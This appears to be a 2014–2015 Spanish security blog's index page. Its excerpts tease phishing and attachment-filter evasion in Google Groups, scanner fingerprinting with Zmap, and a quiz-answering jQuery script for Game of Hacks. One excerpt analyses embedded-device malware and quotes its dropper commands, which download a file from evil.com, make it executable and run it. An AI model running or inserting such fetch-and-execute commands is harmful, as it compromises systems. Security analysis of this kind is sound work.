domingo, 8 de marzo de 2015

Evadir el filtrado de extensiones ejecutables en Google Groups

En el post anterior comentaba como hacer phishing con Google Groups usando los archivos adjuntos. Hoy veremos algo un poco más interesante }:]

Vaya por delante que lo expuesto en este post fue reportado al equipo de seguridad de Google y ellos concluyeron que o bien no se trata de un fallo de seguridad o su impacto es muy pequeño.

viernes, 27 de febrero de 2015

Vamos de pesca con Google Groups

Antes de empezar

Antes de continuar con la lectura de este post es necesario leer el siguiente hilo de mensajes en Google Groups a fin de contextualizar y comprender el resto de la entrada:

De pesca con Google Groups (primera parte)

sábado, 6 de diciembre de 2014

TCP Initial Window Size Fingerprinting with Zmap

¿Qué pasa cuando juntas una interesante técnica de fingerprinting con uno de los más rápidos scanners de Internet? Veamos... }:))

domingo, 19 de octubre de 2014

Set execution bit without chmod: A malware trick

Sucedió una vez, mientras analizaba por entretenimiento una muestra de malware para dispositivos embebidos, que encontré una secuencia de comandos bastante curiosa:

cd /var/run
cp /bin/cp evil
wget http://evil.com/evil -O evil
chmod +x evil
./evil

El propósito de cada línea, independientemente de las demás, está claro. Sin embargo, lo que me resultaba desconcertante era el comando "cp" ¿Para qué el malware crea una copia de "/bin/cp" si luego la sobrescribe inmediatamente?

sábado, 23 de agosto de 2014

¿Cómo ganar en Game of Hacks?

¿Ya vieron éste juego? http://www.gameofhacks.com/game

Yo me animé a probarlo y estuve un rato respondiendo preguntas contra reloj lo más rápido que podía para alcanzar un buen ranking. Después de intentar varias veces me di cuenta que las preguntas eran repetitivas y que las alternativas no cambiaban ni siquiera de orden. Y, puesto que a esas alturas yo ya respondía de forma mecánica, me propuse otro tipo de reto: automatizar la resolución del cuestionario.

Usando el inspector de Firefox y algo de código javascript (JQuery) he llegado a estar en el primer puesto xD

Fig. 1 - Top 10 de Game of Hacks (23/08/2014 21:30 GMT -5)

Lo único que tengo que hacer es copiar el siguiente código en la consola del inspector y luego llamar a la función "resolve()" cada vez que me aparece una pregunta.

function resolve() {
    var ans = $('.answer');
    var code = $('.board-quest-body > pre:nth-child(1) > code:nth-child(2)').html();    
    if (code.search('disp\\.forward\\(request, response\\);') >= 0) {ans[0].click();}
    if (code.search('knockout\\.js') >= 0) { ans[2].click(); }
    if (code.search('SQLCHAR') >= 0) { ans[2].click(); }
    if (code.search('int  isAdmin = 0;') >= 0) { ans[1].click(); }
    if (code.search('writeToFile\\(path\\);') >= 0) { ans[0].click(); }
    if (code.search('unserialize\\(base64_decode') >= 0) { ans[0].click(); }
    if (code.search('creditCardNumberFextField') >= 0) { ans[3].click(); }
    if (code.search('char name\\[64\\];') >= 0) { ans[2].click(); }
    if (code.search('ldap_search\\(\\$ds, \\$dn, \\$dn, \\$justthese\\);') >= 0) { ans[0].click(); }
}

Ahora puedes decirme tramposo si quieres, pero es un reto de hacking así que en mi opinión todo se vale xD

Un saludo.